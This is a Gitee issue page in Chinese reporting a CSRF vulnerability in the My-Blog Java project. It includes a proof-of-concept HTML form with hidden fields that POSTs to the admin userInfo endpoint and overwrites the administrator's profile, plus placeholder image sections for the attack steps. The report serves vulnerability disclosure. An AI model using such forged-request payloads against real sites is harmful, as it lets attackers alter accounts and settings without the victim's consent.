20 Star 569 Fork 188

ZHENFENGSHISAN / My-Blog

 / 详情

CSRF 漏洞

待办的
创建于  
2023-03-24 12:45

建立如下页面

<form action="http://127.0.0.1:28083/admin/configurations/userInfo" method="POST" enctype="application/x-www-form-urlencoded">    <input name="yourAvatar" value="hahahaha" hidden>    <input name="yourName" value="hahahaha" hidden>    <input name="yourEmail" value="hahahaha" hidden>    <input type="submit"></form>

攻击前
输入图片说明

payload
输入图片说明

攻击
输入图片说明

效果
输入图片说明

评论 (0)

hyqf 创建了任务

登录 后才可以发表评论

状态
负责人
里程碑
Pull Requests
关联的 Pull Requests 被合并后可能会关闭此 issue
分支
开始日期   -   截止日期
-
置顶选项
优先级
参与者(1)
Java
1
https://gitee.com/zhenfeng13/My-Blog.git
git@gitee.com:zhenfeng13/My-Blog.git
zhenfeng13
My-Blog
My-Blog

搜索帮助

14c37bed 8189591 565d56ea 8189591